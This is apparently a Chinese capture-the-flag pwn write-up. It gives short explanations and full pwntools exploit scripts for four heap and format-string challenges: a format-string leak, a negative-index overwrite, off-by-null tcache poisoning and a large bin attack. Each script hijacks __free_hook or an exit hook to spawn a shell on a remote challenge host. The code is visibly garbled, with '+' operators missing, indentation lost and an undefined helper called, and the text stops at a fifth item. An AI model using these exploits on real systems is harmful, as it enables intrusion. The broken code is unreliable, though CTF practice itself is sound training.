最后利用传统的exit_hook,劫持_dl_rtld_lock_recursive为one_gadget,当调用exit函数时可得到shell
exp:
#!usr/bin/env python
#-*- coding:utf8 -*-
from pwn import *
import sys
pc="./note"
reomote_addr=["47.104.70.90",25315]
elf = ELF(pc)
libc = elf.libc
context.binary=pc
context.terminal=["gnome-terminal",'-x','sh','-c']
if len(sys.argv)==1:
# p=process(pc)
context.log_level="debug"
p=process(pc,env={"LD_PRELOAD":"./libc-2.23.so"})
if len(sys.argv)==2 :
if 'l' in sys.argv[1]:
p=process(pc)
if 'r' in sys.argv[1]:
p = remote(reomote_addr[0],reomote_addr[1])
if 'n' not in sys.argv[1]:
context.log_level="debug"
ru = lambda x : p.recvuntil(x,timeout=0.2)
sn = lambda x : p.send(x)
rl = lambda : p.recvline()
sl = lambda x : p.sendline(x)
rv = lambda x : p.recv(x)
sa = lambda a,b : p.sendafter(a,b)
sla = lambda a,b : p.sendlineafter(a,b)
shell= lambda :p.interactive()
ru7f = lambda : u64(ru('\x7f')[-6:].ljust(8,'\x00'))
rv6 = lambda : u64(rv(6) '\x00'*2)
def lg(s,addr):
print('\033[1;31;40m s-->0x%x\033[0m'%(s,addr))
what_choice="choice: "
ch_add="1"
ch_dele=""
ch_edit="2"
ch_show="3"
what_size="size: "
what_c="content: "
what_idx=""
def add(size,c='a'):
ru(what_choice)
sl(ch_add)
ru(what_size)
sl(str(size)) # 0x100
ru(what_c)
sn(c)
# ru(what_c)
def edit(c,hhh=''):
ru(what_choice)
sl(ch_edit)
ru("say ? ")
sn(c) ##0x64
ru("? ")
sl(hhh)
def show():
ru(what_choice)
sl(ch_show)
ru("content:")
add(0x20)
bp(0x1235,'\nc')
edit('%7$s'.ljust(8,'\x00'),p64(0xfbad1800) '\x00'*3*8 '\n')
libc_base = ru7f() - 0x3c36e0
lg("libc_base",libc_base)
rtld_lock = libc_base 0x5f0f48
one_addr=libc_base 0xf1247
edit('%7$s'.ljust(8,'\x00') p64(rtld_lock),p64(one_addr))
ru(what_choice)
sl('0')
shell()
flag{006c45fa-81d5-45eb-8f8c-eb6833daadf5}
2、**lemon**开头的伪随机数可绕过,使得flag输入到栈上;
程序在bss段上残留了一个栈地址:
所有菜单函数里面都没有检查负下标,所以可以修改栈空间,通过部分覆盖将环境变量的一个指针改为flag的地址,之后破坏堆结构,报错即可泄露出flag
exp:
# -*- coding:utf8 -*-
from pwn import *
pc = "./lemon_pwn"
libc = ELF('./libc-2.26.so')
context.binary = pc
context.terminal = ["gnome-terminal", '-x', 'sh', '-c']
context.log_level= 'debug'
remote_addr = ["47.104.70.90", 34524]
ru = lambda x : p.recvuntil(x,timeout=0.2)
sn = lambda x : p.send(x)
rl = lambda : p.recvline()
sl = lambda x : p.sendline(x)
rv = lambda x : p.recv(x)
sa = lambda a,b : p.sendafter(a,b)
sla = lambda a,b : p.sendlineafter(a,b)
shell= lambda :p.interactive()
ru7f = lambda : u64(ru('\x7f')[-6:].ljust(8,'\x00'))
rv6 = lambda : u64(rv(6) '\x00'*2)
menu = lambda x:p.sendlineafter(">>> ",str(x))
def lg(s, addr):
print('\033[1;31;40m s-->0x%x\033[0m' % (s, addr))
def bp(bkp=0, other=''):
if bkp == 0:
cmd = ''
elif bkp <= 0x7fff:
cmd = "b *$rebase(" str(bkp) ")"
else:
cmd = "b *" str(bkp)
cmd = other
attach(p, cmd)
def add(index, name, size, content):
menu(1)
ru("index of your lemon")
sl(str(index))
ru("name your lemon:")
sn(name)
ru("of message for you lemon:")
sl(str(size))
ru("Leave your message:")
sn(content)
def add2(index, name,size):
menu(1)
ru("index of your lemon")
sl(str(index))
ru("name your lemon:")
sn(name)
ru("of message for you lemon:")
sl(str(size))
def show(index):
menu(2)
ru(" your lemon :")
sl(str(index))
def dele(index):
menu(3)
ru(" your lemon :")
sl(str(index))
def edit(index, content):
menu(4)
ru(" index of your lemon")
sl(str(index))
ru("Now it's your time to draw and color!")
sn(content)
def exploit():
sl("yes")
sa("Give me your lucky number:",p64(0xcff48db8b7c913e7))
sa("tell me you name first:",p64(0)*2 '\x00\x20\x00\x00\x01')
ru("0x")
flag = int(rv(3),16)
success(hex(flag))
flag2 = flag 0x1000-0x40 # flag地址的末字节
success(hex(flag2))
payload = 'a'*0x138 chr(flag2&0xff) chr((flag2>>8)&0xff) ##覆盖环境变量的位置
success(payload.encode('hex'))
edit(-260,payload)
add(0,'desh',0x20,'a')
dele(0)
add(0,'desh',0x10,'a')
add2(1,'desh',0x114514)
dele(0)
payload = p64(0x20) p64(0x450) p64(0x100000018) p64(0x0)
add(0,'desh',0x20,payload)
dele(0)
dele(1)
add(0,'\xa0',0x20,'\xa0')
add2(1,p64(0x10),0x20)
while True:
try:
p = remote("47.104.70.90",34524)
exploit()
aaa = ru("or corruption (!prev):")
print aaa
if "flag" in aaa:
pause()
except:
p.close()
continue
flag{f578948e-8b48-494d-a11e-a97b7fbf14ee}
3、**PassWordBox_FreeVersion**fgets可以溢出一个\x00;
libc2.27下的off by null,实现chunk overlap,进而修改tcache的fd指针,分配到__free_hook处,并将其修改为system
#!usr/bin/env python
#-*- coding:utf8 -*-
from pwn import *
import sys
pc="./pwdFree"
reomote_addr=["47.104.71.220",38562]
elf = ELF(pc)
libc = elf.libc
context.binary=pc
context.terminal=["gnome-terminal",'-x','sh','-c']
if len(sys.argv)==1:
# p=process(pc)
context.log_level="debug"
p=process(pc,env={"LD_PRELOAD":"./libc.so.6"})
if len(sys.argv)==2 :
if 'l' in sys.argv[1]:
p=process(pc)
if 'r' in sys.argv[1]:
p = remote(reomote_addr[0],reomote_addr[1])
if 'n' not in sys.argv[1]:
context.log_level="debug"
ru = lambda x : p.recvuntil(x,timeout=0.2)
sn = lambda x : p.send(x)
rl = lambda : p.recvline()
sl = lambda x : p.sendline(x)
rv = lambda x : p.recv(x)
sa = lambda a,b : p.sendafter(a,b)
sla = lambda a,b : p.sendlineafter(a,b)
shell= lambda :p.interactive()
ru7f = lambda : u64(ru('\x7f')[-6:].ljust(8,'\x00'))
rv6 = lambda : u64(rv(6) '\x00'*2)
def lg(s,addr):
print('\033[1;31;40m s-->0x%x\033[0m'%(s,addr))
what_choice="Input Your Choice:"
ch_add="1"
ch_dele="4"
ch_edit="2"
ch_show="3"
what_size="Length Of Your Pwd:"
what_c="Your Pwd:"
what_idx="Which PwdBox You Want Check:"
def add(ID,size,c=''): ##0x100
ru(what_choice)
sl(ch_add)
ru("Input The ID You Want Save:")
sl(ID)
ru(what_size)
sl(str(size))
ru(what_c)
sl(c)
def add2(ID,size,c=''): ##0x100
ru(what_choice)
sl(ch_add)
ru("Input The ID You Want Save:")
sl(ID)
ru(what_size)
sl(str(size))
ru(what_c)
sn(c)
def dele(idx):
ru(what_choice)
sl(ch_dele)
ru("Idx you want 2 Delete:")
sl(str(idx))
def edit(idx,c):
ru(what_choice)
sl(ch_edit)
sl(str(idx))
sn(c)
def show(idx):
ru(what_choice)
sl(ch_show)
ru(what_idx)
sl(str(idx))
add('',0x20) #0
ru("Save ID:")
rv(8)
key = u64(rv(8))
for i in range(7): #1-7
add('d',0xf8)
add('d',0x28) #8
add('d',0xf8) #9
for i in range(2): #10-11
add('Desh',0x48)
add('D',0x28) #12
add('D',0xf8) #13
add('D',0x28) #14
for i in range(7):
dele(i 1)
dele(12)
add2('d',0x28,'a'*0x20 p64(0x1d0^key))
dele(9)
dele(13)
for i in range(8): #1-7 ,9
add('d',0xf8)
show(10)
ru("Pwd is: ")
libc_base = u64(rv(8))^key
libc_base -= 0x3ebca0
free_hook=libc_base libc.sym['__free_hook']
sys_addr=libc_base libc.sym['system']
lg("libc_base",libc_base)
lg("free_hook",free_hook)
add('d',0x48) #13
dele(10)
edit(13,p64(free_hook))
add('d',0x40,p64(0x68732f6e69622f^key)) #10
add('d',0x40,p64(sys_addr^key))
dele(10)
lg("key",key)
shell()
flag{2db0e64f-afe1-44d4-9af9-ae138da7bb4b}
4、PassWordBox_ProVersion存在UAF,且只能申请largebin大小的chunk
通过2.31的large bin attack,可以修改 mp_结构体中的tcache_bins和tcache_max_bytes
之后通过计算,在伪造的tcache struct的相应size的位置上写上__free_hook,可将其申请出来改为system
exp:
#!/usr/bin/env python
# -*- coding: utf-8 -*-
from pwn import *
pc = './pwdPro'
# p = process(pc)
libc = ELF("./libc.so")
p = remote("47.104.71.220", 49261)
context.log_level = 'debug'
context.binary=pc
context.terminal=["gnome-terminal",'-x','sh','-c']
ru = lambda x : p.recvuntil(x,timeout=0.2)
sn = lambda x : p.send(x)
rl = lambda : p.recvline()
sl = lambda x : p.sendline(x)
rv = lambda x : p.recv(x)
sa = lambda a,b : p.sendafter(a,b)
sla = lambda a,b : p.sendlineafter(a,b)
shell= lambda :p.interactive()
ru7f = lambda : u64(ru('\x7f')[-6:].ljust(8,'\x00'))
rv6 = lambda : u64(rv(6) '\x00'*2)
def add(idx, id, size, content="a\n"):
sla("Choice:", "1")
sla("Add:", str(idx))
sla("Save:", id)
sla("Of Your Pwd:", str(size))
sa("Your Pwd:", content)
def show(idx):
sla("Choice:", "3")
sla("", str(idx))
def edit(idx, content):
sla("Choice:", "2")
sla("Edit:", str(idx))
sn(content)
def dele(idx):
sla("Choice:", "4")
sla("Delete:", str(idx))
def re(idx):
sla("Choice:", "5")
sla("Recover:", str(idx))
add(0, "a", 0x450)
ru("ID:")
rv(8)
key = u64(rv(8))
print(hex(key))
add(1, "a", 0x420)
dele(0)
re(0)
show(0)
ru("Pwd is: ")
libc.address = (u64(rv(8))^key) - 0x1ebbe0
print(hex(libc.address))
add(0, "a", 0x450)
add(2, "a", 0x440)
add(3, "a", 0x420)
dele(0)
add(4, "a", 0x600)
dele(2)
re(0)
show(0)
ru("Pwd is: ")
rv(0x10)
heap_addr = u64(rv(8))^key
print(hex(heap_addr))
edit(0, p64(libc.address 0x1ec010 )*2 p64(heap_addr) p64(libc.address 0x1eb2d8-0x20-4) '\n')
add(10, "a", 0x600)
add(11, "a", 0x800, p64(u64("/bin/sh\x00")^key) "\n")
dele(10)
edit(0, "a"*0xe8 p64(libc.sym['__free_hook']))
add(12, "a", 0x600, p64(libc.sym['system']^key) '\n')
dele(11)
shell()
flag{909cf735-b274-4098-885b-589300839b71}
5、JigSaw'sCage存在整数溢出/宽度溢出,可以绕过检查得到一块rwx的堆地址:
